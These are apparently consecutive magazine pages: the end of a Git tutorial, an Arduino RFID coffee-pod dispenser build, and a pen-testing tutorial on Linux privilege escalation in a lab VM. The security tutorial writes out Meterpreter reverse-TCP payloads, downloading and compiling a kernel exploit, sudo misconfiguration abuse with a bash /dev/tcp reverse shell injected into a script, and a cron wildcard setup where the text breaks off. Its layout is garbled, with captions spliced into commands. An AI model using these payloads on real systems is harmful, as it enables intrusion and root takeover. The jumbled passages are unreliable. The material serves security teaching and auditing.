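# The first author changes the age and pushes first...
cd "$tmp/author1"
echo "Emma was seventeen years old." > novel.txt
git commit -q -a -m "Changed Emma's age to 17."
git push -q origin HEAD

# ...then the second author edits the same line and pulls.
cd "$tmp/author2"
echo "So okay, Emma had a normal life for a teenage girl." > novel.txt
git commit -q -a -m "Changed the first paragraph."
git -c pull.rebase=false pull -q origin "$branch" || echo "merge conflict reported"
grep -c "<<<<<<< HEAD" novel.txt         # Git's conflict markers are now in the file

# Resolve by hand (here: keep a merged line), then commit and push.
echo "So okay, Emma was a normal 17-year-old girl." > novel.txt
git commit -q -a -m "Resolved merge conflict."
git push -q origin HEAD
```

Because both clones talk to a plain directory rather than a remote server, nothing here needs a network connection or a GitHub account.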
Above Git has its own special format for displaying merge conflicts concisely within files. Some editors, such as Atom, can recognise this, and make it easy to choose one branch or another

Using Git to undo changes
Now suppose that we wake up the next day and realise that the new 'modern' opening paragraph doesn't really fit in with the rest of the novel. We want to return to a previous version of the project. To do this, we should first run the following command:

$ git log

This command opens an instance of the less text viewer, containing logging information about every commit that has been made. You use the arrow keys to navigate up and down, and can press Q when you have finished reading.
We want to revert the commits, which means creating a new commit that does precisely the opposite of what that commit did: if we added some text, then reverting the commit will produce a new commit that removes that text, and vice versa. We want to revert the last three commits that were made to the repository: the merge conflict and the two 'improvements' from the two different authors. We'll start with the merge conflict. In the output from git log, this is displayed in the following form:

commit 2e68c483abe7db1cd87627ed2092cd24b085f0e0 (HEAD -> master, origin/master, origin/HEAD)
Merge: 22bff53 f9a7218
Author: johngowers <[email protected]>
Date: Wed Mar 21 19:49:46 2018 +0000

    Resolved merge conflict.

The long hexadecimal code identifies this merge commit. In order to produce the commit that reverts it, we run the following command – replace the hex code with the one corresponding to the merge conflict in your setup:

$ git revert -m 1 2e68c483abe7db1cd87627ed2092cd24b085f0e0

Here, the -m 1 is specific to reverting a merge commit (rather than some other commit). The number 1 refers to which of the two conflicting branches should be considered the main one. Git will pop up a text editor, where we write our revert message, before saving and exiting to trigger the reversion. Now, it's time to revert the other two changes. We can do this with:

git revert <first-commit-code> <second-commit-code>

where we replace <first-commit-code> with the hexadecimal code corresponding to the commit that changed the first paragraph, and replace <second-commit-code> with the hexadecimal code corresponding to the commit that changed Emma's age to 17. Save and close the text file as before to create a new commit to revert these changes. We can now run git push -u origin master to push the revert to the online version. If we go into our second local copy and run git pull, that branch will be up-to-date as well.
If we want to undo changes that we haven't committed, we have a couple of options. We can either run

$ git reset --hard <hash-code>

where <hash-code> is the hexadecimal code for the last commit that we want to return to, or we can run the command git stash – of which more next issue…
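Reverting is easy to experiment with in a throwaway repository. This sketch is our own demo (not the magazine's novel repository; file contents and messages are invented): it shows git revert undoing a committed change and git reset --hard discarding an uncommitted one:

```shell
#!/bin/sh
set -e
tmp=$(mktemp -d); cd "$tmp"
git init -q demo && cd demo
git config user.name "Demo"; git config user.email "[email protected]"

echo "Emma was twenty-one years old." > novel.txt
git add novel.txt; git commit -q -m "Original text"
echo "Emma was seventeen years old." > novel.txt
git commit -q -a -m "Changed Emma's age to 17."

# Revert the last commit without rewriting history; --no-edit keeps
# Git's default revert message instead of opening an editor.
git revert --no-edit HEAD >/dev/null
grep "twenty-one" novel.txt              # the original text is back

# Uncommitted changes can simply be thrown away with reset --hard.
echo "scratch text" >> novel.txt
git reset -q --hard HEAD
grep -q "scratch" novel.txt || echo "uncommitted change discarded"
```

Note that revert adds a new commit on top of the history, so it is safe on a shared branch, whereas reset --hard only touches your local working copy.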

Tutorial Arduino: Coffee Dispenser

part one

Arduino: Build your own coffee pod dispenser
Bring Arduino into the workplace and set up an (almost) automated and cash-free coffee club using RFID cards

Alexander Smith is a computational physicist. He teaches Arduino to grad students and discourages people from doing lab work manually.

Resources
Arduino Mega
RFID Kit (MF522-AN)
Soldering iron
Raspberry Pi (or other computer)
Python

Arduinos aren't just for fun and games – sometimes there's a need for them in your professional life too. They could be used for taking measurements in a lab, as props in presentations, or – more importantly – for dispensing coffee in the office kitchen. If you happen to work for a company that doesn't provide staff with coffee, you're likely to have come across a 'coffee club' or an honesty jar where people pay the asked amount for a scoop or pod of coffee. While this is a good system and, generally speaking, works well, there are obvious benefits which automation can bring: no longer any need to carry small change, the ability to monitor coffee supplies, and to determine which flavours are popular.
So in this two-part tutorial we're going to create a machine which dispenses coffee pods after someone has signed in and paid using a company RFID card. Users will not need to type in a username and a password, and the money can be paid in advance to the coffee club manager. The machine will display their account balance and let them select which flavour of coffee pod they want. In the next issue we'll cover the manufacturing of a frame, using motors to release the coffee and checking if a pod was actually dispensed.

Use RFID
Radio-frequency identification, or RFID, is a technology which has found widespread use in systems including Oyster cards, staff access cards and even credit cards. Each card contains an antenna, circuitry and a data storage unit, at the minimum. By flashing your RFID card over a reader, a system can power up the card and begin to communicate, extracting the data, identifying the user and then performing a desired action – such as opening a door or billing a bank account.
One of the most widely used brands is Mifare, owned by NXP Semiconductors. Over 10 billion RFID cards and 260 million card readers have been issued by it and are used in the London Underground, as disposable tickets
for the FIFA World Cup, and in universities worldwide. However, the encryption provided by some of these cards – Crypto-1 – has been compromised, so cards such as the Mifare Classic have fallen out of favour in applications where security matters. Despite this, there are quite a few still in use, and cards and reader kits that can easily be used with an Arduino or Raspberry Pi can be picked up online for a few pounds. Regardless of the card your workplace uses, you can still read card IDs without needing to decrypt the data.

Solder pins to the reader
The low-cost RFID kits are delivered to you as a blank RFID card, a key fob, reader module and (hopefully) a pin strip. The reader panel contains the RFID communication circuit, as well as circuits and a chip to handle power and information transfer. In this tutorial we're using the MF522-AN module. There will be a small set of eight holes positioned linearly along the bottom of the card. These holes need to connect to the Arduino in order for you to begin using the reader.
In previous tutorials, we've shied away from soldering where possible; however, in this instance, it is essential that you have access to a soldering iron and some solder, and that you solder the connector pins to the RFID reader.
Begin by turning on the soldering iron and letting it heat up. Meanwhile, thread the connector pins through the holes in the RFID reader – you want the long ends to go into the Arduino and the short ends to go through the reader. When it's at the desired temperature, put the soldering iron in contact with the metal on the pin – not the hole – and gently press the solder into the gap between the pin and the hole. It should melt and form a continuous surface, surrounding and contacting the pin and the hole. If so, the connection has been formed and you can move on to the rest of the pins. For those new to soldering, remember to use a well-ventilated room, wash your hands afterwards, don't burn yourself and don't breathe in any lead-based solder fumes – if you have a desk fan, use it to blow the fumes away from you.

Above Card reader kits can be purchased cheaply online, and work with a variety of cards

Connect through SPI
Using a set of jumper wires, connect the pins on the RFID reader to the Arduino. You're going to be using the serial peripheral interface (SPI) for the reader. This enables quick communication between two microcontrollers – the Arduino and the reader – but can only be performed using a certain group of digital pins, so it's important to ensure these pins are connected to the reader. They're not always in the same positions between different boards. With SPI there is a master device (in this case the Arduino) which tells other devices (the reader) that it is the slave through the SS (slave select) pin. There are then two communication lines: MOSI (master out, slave in) and MISO (master in, slave out); and another, SCK (serial clock), to handle timing. When a device is told to go into slave mode, it begins to listen to the MOSI line and will respond using MISO. This allows several devices to share the same communication lines, only listening when they are told to do so by the master.
For this tutorial, we're going to use the Arduino Mega, which has the SPI interface on pins 50 to 53. On the Uno the pins are 10 to 13. On the Leonardo and Micro, you have to use the ICSP header pins instead, which stand in the middle of almost all Arduino boards. For the Arduino Mega, pin 50 is MISO, pin 51 is MOSI, pin 52 is SCK and pin 53 is SS (although in principle any digital pin could be used). These pins are clearly marked on the RFID card reader – although SS will be labelled SDA – and should connect to the corresponding pin on your Arduino. There should also be ground and 3.3V pins on the reader, which should be connected to the equivalent Arduino pins. There will also be a reset pin on the reader which needs to go to a digital pin and, depending on your model, possibly an IRQ pin which can be left disconnected.
The RFID reader uses a 3.3V power supply, not a 5V supply; using a higher voltage could be damaging for the reader. For correct connection to the Arduino, the remaining digital lines should also be running at 3.3V. However, in this instance, it appears 5V on these (non-power) lines doesn't harm functionality. Strictly speaking, you should be using a level-shifter to reduce all 5V Arduino outputs to 3.3V (and increase 3.3V to 5V for the reader outputs). These can also be picked up cheaply online, but we won't be using them in this tutorial.

Encrypt blank cards
If you decide it's worth issuing new RFID cards to members of the coffee club, it's worth considering using the data storage blocks to store your own user ID and adding encryption. Even if it can be cracked, it makes it harder to clone the cards and gives you space to store or even back up account information.

Program your Arduino
Now that the RFID reader is connected, you can quickly start reading data from certain RFID cards, including the Mifare Classic. To begin, you need to download the MFRC522 library. This can be done through the Arduino


IDE under Sketch > Include library > Manage libraries. Search for 'MFRC522' and press Install; you can also do this in the online editor using the Library Manager.
Open the example sketch 'DumpInfo' that comes with the library. This will be the skeleton around which you will write the sketch for the coffee pod dispenser. The sketch begins by including the SPI and MFRC522 libraries and defining the reset (RST_PIN) and slave select (SS_PIN) pins. Modify the top of the sketch to match your setup; don't worry about the rest of the SPI pins – we've used the default configuration. The sketch then goes on to initialise an MFRC522 object using:

MFRC522 mfrc522(SS_PIN, RST_PIN);

and, in setup, begins connection to the RFID reader and requests information about the reader. In loop there are then two if conditions which return the program to the beginning of loop unless a new card is placed in front of the reader, and the reader can establish a connection with the card and read data from it. If data is read, the sketch finishes by executing:

mfrc522.PICC_DumpToSerial(&(mfrc522.uid));

writing all card data to serial (your computer) and automatically terminating the connection with the card.
Open the Serial Monitor from the Arduino IDE and scan a card in front of the reader – you can use the one provided with the kit and then consider trying others. It should begin with a unique identifier, the card model, and then lots of text, broken into blocks. This is the card data which can be used to store data, such as employee number or account balance. If your Arduino says that authentication failed, your card is encrypted.

Using Python databases
There are Python libraries which enable you to interface with and manage databases. These libraries act as drivers for databases such as SQLite, PostgreSQL and MySQL, which can therefore be manipulated from a Python script. This is a good route if a web application is suitable for managing your coffee club and letting new users register.

Below Use a breadboard to make wiring the RFID reader to the Arduino easier

Identify the card
In order for the user to order a coffee, they'll need to flash their RFID card in front of the reader, from which we can extract information about the card – and therefore the card holder. With the Mifare Classic series of cards, the data stored takes the format of header information, followed by blocks of data, which in some cases can be encrypted. If you plan to issue users with your own cards, you can make use of the other example sketches to write data to certain blocks on the card. You can encrypt them using the Crypto-1 algorithm built in to the cards and the Arduino library – although, as mentioned earlier, this provides little security and is no longer used on newer Mifare card models.
If you intend to use employee identification cards for this system, as we will demonstrate, it will be much harder (and perhaps a bad idea) to write to blocks on the card. For one thing, you definitely don't want to be overwriting information already present on the card – your employer might be a bit peeved if they catch you 'tampering' with it! An easy way around this, although not without its drawbacks, is to just read the unique identifier (UID) written to the card by the manufacturer.
While this is a quick and dirty way of identifying the user, it's a bad idea if you care about security: it is possible to clone these cards and overwrite the UID field. In principle, anyone could pretend to be someone else (if they know a UID for members of your coffee club) and get a free coffee from your machine – so that'd be no better than an honesty jar. However, if you're reasonably confident that employees' cards will be protected by the user and not left lying around, just grabbing the UID should be sufficient. If you are still worried, you could always get the user to input a PIN code before issuing a pod and charging their account.
Luckily for us, the MFRC522 object stores the UID separately as a byte array, so we can access it using mfrc522.uid.uidByte – and similarly for the size. If you would prefer the card ID in hexadecimal, open the ReadNUID example and steal the printHex function from the bottom. You can then call:

printHex(mfrc522.uid.uidByte, mfrc522.uid.size);

passing the byte array and its length to the function printHex. This function calls Serial.print to write the UID over serial – in this case, over USB to the connected computer. That's all that's needed to identify a user, and all the Arduino needs to do until we move on to processing orders and dispensing the coffee.
Now that there's a steady stream of card IDs being transmitted from the Arduino, it's time to bring a computer into the mix so that we can determine whether

or not coffee should be served to a user. The aim of the rest of this tutorial is to establish whether or not a user is a member of the club, if they have enough money associated with their ID, and then, if the user orders a coffee, to subtract a preset amount of money after the pod has been dispensed. Instinctively, one might consider using a database to manage users and their accounts, and languages such as Python – which, as we've seen in previous tutorials, can also be used to communicate easily with the Arduino – have ways of doing this. Python can even be integrated with a MySQL database, which enables us to create a website where a user or manager can manage an account. If this is something that interests you, we recommend you go for it, but it's a little outside the scope of this tutorial.
Connect a Raspberry Pi to the Arduino Mega by USB; an adaptor might be required to convert to Micro-USB. On the Pi Zero W, we use the adaptor to connect to the USB terminal, and power both the Raspberry Pi and Arduino through the Pi's Power USB port. We chose the Pi Zero W as it's low-cost and has built-in Wi-Fi, thus enabling us to log in remotely.

Above Connecting the Arduino to the Pi may require a USB adaptor, depending on the model

Check against known users
We can now begin creating our pseudo-database of coffee club members and adding money to accounts. As stated before, this isn't the most effective way of managing the club, but all we now need to do is to create a dedicated folder where we can store user accounts. Each time an RFID card is swiped against the reader, the Pi can take note of the card details by creating a new file with the UID of the card as a filename, and entering a default amount of money: zero. To read the message sent over serial, you can open a Python script and initialise a connection with the Arduino by specifying the port:

arduino = serial.Serial(port)

and then you can read incoming messages and store them as strings, using

msg = arduino.readline().decode("utf-8")

For the more security-conscious, using the UIDs as filenames might seem like a bad idea – at the very least, we should be hashing them. It's also going to be difficult to manually top up an account without having another card reader and an Arduino sitting next to the manager's computer to work out who owns each card. Instead, we can exploit Python's dictionaries to link human-readable filenames with matching hashed UIDs.
When a user swipes their card in front of the reader, the Pi receives a UID as a string. The Pi can then hash the UID and check the Python dictionary to see if that string exists. If the ID doesn't exist, the script can then create a file, using the hashed ID as the filename, which the user can then manually open to enter their name.
Each time the Pi boots up, it can form the dictionary from this folder of hashed UIDs, mapping the UID to the contents of its file – the name of the card holder. If a hashed UID is found to already exist in the dictionary, the script can use the mapping to convert to a username, open their account file – created when the user registers – and find out how much money they have in their account. If they have money in their account, the Pi can tell the Arduino to dispense a coffee pod.

Await input, give feedback
Once the Pi has determined that the user exists and how much money is in their account, the Arduino also needs to be informed, so that it knows whether or not it's okay to dispense a coffee. If you want to go a bit further and let the user know how much money is in their account, the Pi could send the account balance over serial and back to the Arduino, which could then display the amount of money the user has left on an attached LCD.
All that's left to do is to wire up a button or two – as we have done countless times before – so the user can pick a flavour and agree to the sale of the coffee pod. There's no need to add an interrupt to do this; most of the program (on both machines) will involve waiting for a message to be sent or received.
The Arduino sends the UID, the Pi sends the balance, the Arduino sends the coffee selection, the Pi subtracts the amount and says okay. There is still some work to be done handling errors, and perhaps implementing a time-out, but you should now be in a good position to start designing the physical machine and considering the mechanics of dispensing pods of coffee. We'll get onto those topics, and a few more, in the next issue.
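As a concrete sketch of this pseudo-database, the Pi-side bookkeeping might look like the following. All function names, the SHA-256 choice of hash and the balance-in-pence convention are our own illustration, not code from the tutorial:

```python
# One file per member, named after the hash of the card UID, holding
# that member's balance in pence as plain text.
import hashlib
import os


def hash_uid(uid):
    """Hash a card UID so that raw UIDs never appear as filenames."""
    return hashlib.sha256(uid.encode("utf-8")).hexdigest()


def register(folder, uid):
    """Create an account file with a default balance of zero."""
    path = os.path.join(folder, hash_uid(uid))
    if not os.path.exists(path):
        with open(path, "w") as f:
            f.write("0")
    return path


def load_accounts(folder):
    """Map each hashed UID (the filename) to the balance in its file."""
    accounts = {}
    for name in os.listdir(folder):
        with open(os.path.join(folder, name)) as f:
            accounts[name] = int(f.read().strip() or 0)
    return accounts


def charge(folder, uid, price):
    """Subtract `price` if the member exists and has enough money."""
    path = os.path.join(folder, hash_uid(uid))
    if not os.path.exists(path):
        return False          # unknown card: do not dispense
    with open(path) as f:
        balance = int(f.read().strip() or 0)
    if balance < price:
        return False          # not enough credit
    with open(path, "w") as f:
        f.write(str(balance - price))
    return True
```

Keeping each balance in its own file, as the tutorial suggests, means the manager can top up an account with nothing more than a text editor.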

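That UID/balance/selection/okay exchange can be sketched as a small state machine on the Pi side. The message formats and names below are our own invention (the real script would feed it lines read from the serial port, and prices would come from configuration):

```python
# One step of the Pi-side protocol: first message from the Arduino is a
# UID, the second is a flavour selection for that UID.
def handle_message(accounts, state, line, price=50):
    """Return (new_state, reply) for one incoming serial line.

    `accounts` maps UIDs to balances in pence; `state` is the UID
    currently being served, or None while waiting for a card swipe.
    """
    line = line.strip()
    if state is None:                      # expecting a UID
        if line in accounts:
            return line, "BALANCE %d" % accounts[line]
        return None, "UNKNOWN"
    # expecting a flavour selection for the UID held in `state`
    if accounts[state] >= price:
        accounts[state] -= price           # subtract the preset amount
        return None, "OK %s" % line        # tell the Arduino to dispense
    return None, "REFUSED"
```

Because each reply resets the state to None on completion, a time-out handler only has to clear `state` to recover from a half-finished order.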
Tutorial Computer Security

Security: Privilege escalation techniques
Learn how attackers may gain root access by exploiting misconfigured services, kernel bugs and more

Toni Castillo Girona holds a degree in Software Engineering and an MSc in Computer Security, and works as an ICT research support expert in a public university in Catalonia (Spain). Read his blog at http://disbauxes.upc.es

Resources
Post exploitation repository: http://bit.ly/lud_postexp
Metasploit local exploit suggester: http://bit.ly/lud_suggest
LinEnum: http://bit.ly/lud_linenum
Linux exploit suggester: http://bit.ly/lud_suggest2
Exploit database: http://bit.ly/lud_exploit
Vulners scanner: http://bit.ly/lud_vulners
Lynis: https://cisofy.com

Above Get used to auditing your own computers before someone else does (uninvited, that is!)

So far our tutorials in this series have been dealing with different techniques to find and exploit well-known vulnerabilities in order to get a foothold into a system. Most of the time, however, that initial foothold won't get you a root shell. That's because some of these services may run using a non-privileged user account (for example, Apache's 'www-data' user). As a pen-tester, your next step is obvious: to escalate privileges, or 'priv esc'. To some, priv esc is kind of an art, and we agree. Whatever your thoughts about it, priv esc can be achieved by abusing misconfigured services, exploiting vulnerable programs, taking advantage of kernel bugs, or performing social engineering attacks. There are some tools that will assist you throughout this process (see Resources). The Metasploit framework, for instance, ships with a bunch of local exploits for some well-known vulnerable programs (see modules/exploits/linux/local). Sometimes it's tempting to execute a local kernel exploit to get root, but we strongly discourage you from doing so, because these exploits tend to make the system unstable and sometimes they may even crash it. Without further ado, are you ready to delve into the fascinating world of privilege escalation techniques? Read on!

Get root through Ring 0
We've already mentioned that getting root by exploiting a kernel flaw is dangerous, so now it's time for a demonstration. Download Ubuntu 16.04.4 LTS from http://releases.ubuntu.com and install it on a VM with at least two CPUs. Add a new 'Host Only' network device to be able to communicate with the VM directly (for VirtualBox, see http://bit.ly/lud_vb). Don't tick the 'Download updates while installing Ubuntu' option. Boot it up and install a vulnerable kernel: apt-get install linux-image-4.4.0-62-generic. This kernel version is known to have a 'Use-After-Free' flaw (see http://bit.ly/lud_flaw). Now reboot into this new kernel – press Shift during the booting process to access the GRUB menu. Don't install any updates. If you were an attacker already connected to this machine as a non-privileged

user, you would be looking for possible priv esc vectors. Left Identifying priv
Figure 1
You will be that attacker now; install Metasploit on your esc vectors won’t
computer (see http://bit.ly/lud_nightly) and generate a always be that easy –
Meterpreter payload for Linux x64: msfvenom -p linux/ and that’s a relief
x64/meterpreter_reverse_tcp LHOST=<YOURIP>
LPORT=4444 -f elf -o m.e. Upload this file to your
VM, using SSH for example, set its execute bit and run
it: chmod +x m.e; ./m.e&. On your computer, start
msfconsole with a new handler to deal with remote
sessions by typing this one-liner:

msfconsole -qx "use exploits/multi/handler; \


set PAYLOAD linux/x64/meterpreter_reverse_tcp;
\
set LHOST <YOURIP>; set LPORT 4444; \
set ExitOnSession false; run -j"

After a little while, a new session will be established.


Interact with it: sessions -i 1. So far, you, the attacker,
have set a foothold into this computer. Next, you proceed
by getting its kernel version and the release number of ./linux-exploit-suggester.sh -u "<uname -a
output>" Tutorial files
available:
You can use Linux Feel free to try other kernel exploits; some of them are filesilo.co.uk
more reliable. You can use Linux Suggester directly
Suggester on your own on your own computers to determine if they may be
vulnerable. If they are, get patching!
computers to determine Using
Get root through local exploits Metasploit
if they may be vulnerable. To find the kernel version and its installed distribution, spawn a new shell from your meterpreter session first: shell. Then execute uname -r; lsb_release -a. On your computer, clone the exploit database repository (see Resources) and look for possible kernel exploits, excluding DoS exploits and PoCs:

searchsploit -t "Kernel 4.4.0"
--exclude="PoC|/dos/"

As of this writing, there are four exploits that will give you root. Get the DCCP Double-Free exploit: searchsploit -m 41458. Upload this file to your VM using your meterpreter session: upload 41458.c. Alternatively, you can download it directly to the target system: wget https://www.exploit-db.com/download/41458.c. Then spawn a new shell: shell. This shell is really limited in functionality, so use Python to execute a new bash process: python -c 'import pty; pty.spawn("/bin/bash")'. Now compile the exploit: gcc 41458.c -o exploit. Execute it: ./exploit. The chances are that you will see a [+] got r00t ^_^ message right before the system freezes – or maybe the system has already crashed. Of course, there’s still the possibility to gain a root shell and be able to interact with it. Apart from using searchsploit, you can use Linux Exploit Suggester (see Resources) to look for kernel exploits for a particular kernel version. You can even provide the tool with the output of the uname -a command.

Dealing with local kernel exploits is a perilous business, so looking for vulnerable software packages already installed on the target system is a much better (and safer) approach. Reboot your VM and let it boot into its default kernel version. Then downgrade the ntfs-3g package: apt-get install ntfs-3g=1:2015.3.14AR.1-1build1. Now re-run the meterpreter payload to establish a new session back to the attacker (that is, you): /m.e&. Interact with this new session using msfconsole: sessions -i <ID>. A good tool to determine whether there are vulnerable packages installed on a computer is Vulners (see Resources). From your meterpreter session, open a new shell: shell. Finally, get a list of installed packages and store the output in a file by piping it to the tee command:

dpkg-query -W -f='${Package} ${Version} ${Architecture}\n' \
|tee packages.txt

Terminate this channel by pressing Ctrl+C and then download packages.txt to your computer: download packages.txt. Now copy its contents to the clipboard, navigate to https://vulners.com/audit, choose ‘Ubuntu’ as the OS type, ‘16.04’ as the OS version and paste the clipboard contents into the text area. Press ‘Next’. Vulners will show you two vulnerable packages: isc-dhcp-client and ntfs-3g. The first package is vulnerable to a DoS attack whereas the second one is affected by a priv esc vulnerability (see Figure 1). The Metasploit framework ships with a bunch of local exploits for most OSes.

For post exploitation
Metasploit includes a bunch of useful post exploitation modules. Some of these will be useful for gathering additional information if you are a non-privileged user, such as more credentials, juicy files and software versions. Others, on the other hand, will allow you to perform more sinister tasks once you become root: MITM attacks, SSH-pivoting and so on… see http://bit.ly/lud_post.
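The dpkg-query format string used above prints one ‘package version architecture’ triple per line. If you want to sanity-check packages.txt before pasting it into the Vulners web form, a few lines of Python are enough; this parser is an illustrative helper, not part of the tutorial’s toolchain:

```python
# Parse lines produced by:
#   dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'
def parse_dpkg_list(text):
    """Return a list of dicts, skipping blank or malformed lines."""
    packages = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # not a 'name version arch' triple
        name, version, arch = parts
        packages.append({"name": name, "version": version, "arch": arch})
    return packages

sample = """isc-dhcp-client 4.3.3-5 amd64
ntfs-3g 1:2015.3.14AR.1-1build1 amd64"""

for pkg in parse_dpkg_list(sample):
    print(pkg["name"], pkg["version"])
```

Anything the parser skips is a line Vulners would probably choke on too, so it is worth eyeballing those before uploading.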

www.linuxuser.co.uk 45
Tutorial Computer Security

Privilege escalation in Windows
Eleven Paths has developed a Python framework for attacking and mitigating all the well-known techniques to bypass Windows UAC, called Uac-A-Mola (see https://github.com/ElevenPaths/uac-a-mola). This framework implements the techniques known to date: DLL hijacking, CompMgmtLauncher.exe, Eventvwr.exe and fodhelper. UAC exploitation aside, the same principles as with GNU/Linux distros apply here as well.

You can get a list of GNU/Linux local exploits by executing ls -l /opt/metasploit-framework/embedded/framework/modules/exploits/linux/local/. As you can see, there’s a working exploit for ntfs-3g. Use this module, set its payload (a stageless meterpreter reverse TCP payload will do), your IP and a new listening port (remember that the VM is still connected to your port 4444/tcp):

use exploit/linux/local/ntfs3g_priv_esc
set PAYLOAD linux/x64/meterpreter_reverse_tcp
set LHOST <YOURIP>
set LPORT 4445

Because this is a local exploit, it requires an already established session. Use the SESSION_ID of your current meterpreter session: set SESSION <ID>. This module will upload some files to the target computer and it will compile the exploit right there, so make sure you set a valid working directory with write permissions: set WritableDir /home/<USER>, where <USER> is the user you are logged in as. Now, before executing the exploit, make sure to check whether the target is vulnerable: check. Finally, execute the exploit in order to get root: exploit. You will see a new reverse TCP session being established to your computer, and msfconsole will start interacting with it right away. Check if you are root now: getuid (see Figure 2).

“Kernel exploits tend to make the system unstable and sometimes they may even crash it”

You can use vulners-scanner too (see Resources) and execute it directly on the target machine. You can do this from your non-privileged meterpreter session. Background your current privileged session now: background. Get back to your previous non-privileged meterpreter session: sessions -i <ID>. Now spawn a new shell and download vulners-scanner: wget https://github.com/vulnersCom/vulners-scanner/archive/master.zip. Unzip it and execute it: unzip master.zip; cd vulners-scanner-master; ./linuxScanner.py. You will get the same list of vulnerable packages as with the web front-end.

Right Yes, we know: sometimes Metasploit makes priv esc look like child’s play!

Get root through sudo
Sometimes it may be a lot easier to look for misconfigured services and poorly thought-out sudo configurations to gain root. Trust us – we’ve seen this a lot, and sometimes root is just a mere command away! Most sysadmins tend to configure sudo to allow non-privileged users to run privileged commands. Sometimes these commands are allowed to be executed without typing a password. For our next example, install Apache and its PHP module on your VM: apt-get install apache2 libapache2-mod-php. Next, create the .scripts directory in /var/www/html with: mkdir /var/www/html/.scripts. Add the following lines to the /etc/apache2/sites-available/000-default.conf file:

<DirectoryMatch "^\.|\/\.">
Order allow,deny
Deny from all
</DirectoryMatch>

Restart Apache: /etc/init.d/apache2 restart. Now create a new file called purge.sh:

#!/bin/bash
rm -rf /tmp/*

Save this file to /var/www/html/.scripts/ and set its execute bit: chmod +x purge.sh. Finally, make sure to set www-data as the owner of /var/www/html with: chown -R www-data:www-data /var/www/html. Add the following entry to /etc/sudoers: www-data ALL=(ALL) NOPASSWD: /var/www/html/.scripts/purge.sh. This script will be executed by www-data at some point. No one is supposed to run this command directly from the website, of course, thanks to the <DirectoryMatch> directive.

On your computer, kill any established meterpreter session: sessions -K. Then kill all your listeners too: jobs -K. Now, let’s imagine you are an attacker who has been able to exploit a flaw on the website and you have gained a non-privileged PHP meterpreter session. Generate a new payload now: msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOURIP> LPORT=4444 -o m.php. Upload this file to the VM and save it to /var/www/html/. On your computer, change the payload used by the multi/handler listener accordingly: use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp. Now run the module: run -j. Use your favourite browser to access the payload just uploaded by navigating to http://YOURVMIP/m.php. You will get a meterpreter session with the same privileges as www-data. Interact with this session and spawn a new shell (use the Python trick again) to run the command sudo -l; this will list the allowed sudo commands for www-data. See? You now know that you can run the purge.sh script without a password!
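Misconfigurations like this are also easy to audit for defensively. The sketch below is our own illustration, not a standard tool: it scans sudoers-style lines for NOPASSWD entries whose target command is group- or world-writable, or not owned by root, and it only understands the simple one-command form used above:

```python
import os
import re
import stat

# Match lines like: www-data ALL=(ALL) NOPASSWD: /path/to/script
NOPASSWD_RE = re.compile(r"^(\S+)\s+\S+\s+NOPASSWD:\s*(/\S+)")

def risky_nopasswd_entries(sudoers_text):
    """Yield (user, command) pairs where the command file is
    group/world-writable or not owned by root."""
    for line in sudoers_text.splitlines():
        m = NOPASSWD_RE.match(line.strip())
        if not m:
            continue
        user, command = m.groups()
        try:
            st = os.stat(command)
        except OSError:
            continue  # command does not exist; nothing to check here
        writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if writable or st.st_uid != 0:
            yield user, command
```

A real audit would also follow include directives and handle command lists and arguments; tools such as LinEnum (used below) do a more thorough job.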

It so happens that this script is owned by www-data, so it’s a piece of cake to add something more interesting than just rm -rf to it. Terminate this channel with Ctrl+C and use the edit command to edit this file: edit .scripts/purge.sh. Now add the following lines to the file (replace <YOURIP> with your IP address):

/bin/bash -c '/bin/bash -i > /dev/tcp/<YOURIP>/4445 0<&1 2>&1' &
disown $!
exit $?

Save it (:wq!). Background this session and start a new listener using the reverse shell payload: background; set PAYLOAD linux/x64/shell_reverse_tcp; set LPORT 4445. Execute it: run -j. Now get back to your non-privileged session: sessions -i <ID>. Spawn a new shell (don’t forget to use Python again!) and run the script via sudo: sudo /var/www/html/.scripts/purge.sh. A new reverse-TCP session will be established; kill this channel (Ctrl+C) and background the current session: background. Finally, interact with the new session just established: sessions -i <ID>. Run the id command; you are root now!

You can use LinEnum to help find security weaknesses in a system, such as misconfigured files. It’s a standalone bash script that you can upload to your target computer using a non-privileged session and run. It will check for sudo access without a password, locate setuid/setgid binaries, and so on (see Resources). Get back to your non-privileged session, spawn a new shell and download LinEnum.sh: cd .scripts; wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh. Set its execute bit: chmod +x LinEnum.sh. Finally, run it and pipe its output to a file: ./LinEnum.sh|tee r.txt. Kill this channel now (Ctrl+C) and download the file r.txt to your computer: download .scripts/r.txt. Have a look at it now; can you spot the “***Possible Sudo PWNAGE!” warning? We suggest you run this script on your own computers as soon as possible to make sure there are no easy priv esc vectors around!

What next? Dissect malicious Windows binaries with Any.Run

1 Create your account
Visit https://app.any.run/#register and create a new account, with any email address you like. Using the free plan only gives you access to a Windows 7 32-bit sandbox.

2 Upload your malicious binary to the sandbox
Grab your malicious program and send it to the sandbox. You can use the New Task icon on the left (+) to upload a local file, or you can paste a URL holding the binary. Only files up to 16MB are allowed.

3 Let it run
Wait for a while until the sandbox is ready. The system will start gathering some useful information about the program: network connections, registry changes, malicious behaviour, and so on. You are free to interact with the system at any time.

4 Have a look at other submissions
Click the Report icon on the left to get a list of public submissions. Pick the one you may be interested in and click its description; you will see a recorded video of the binary’s behaviour.

5 Upgrade your account
If you think it’s worth it, you can upgrade your free plan. Visit https://app.any.run/plans and choose the one that suits you best (they’re not available yet at the time of writing).

You know what wildcards are; you probably use them on a regular basis. Most of us do. When used loosely, though, bad things can happen. As a matter of fact, things can turn wild (see http://bit.ly/lud_privesc). So let’s imagine that a sysadmin has created the following shell script:

#!/bin/bash
cd /var/www/html && chown www-data:www-data *

Save this file to /usr/local/bin/update-web-owners.sh on your VM. Set its execute bit: chmod +x /usr/local/bin/update-web-owners.sh.

Get root through wildcards
This script has been added to cron to be executed every five minutes as root; add the following line to /etc/crontab on your VM:

*/5 * * * * root /usr/local/bin/update-web-owners.sh

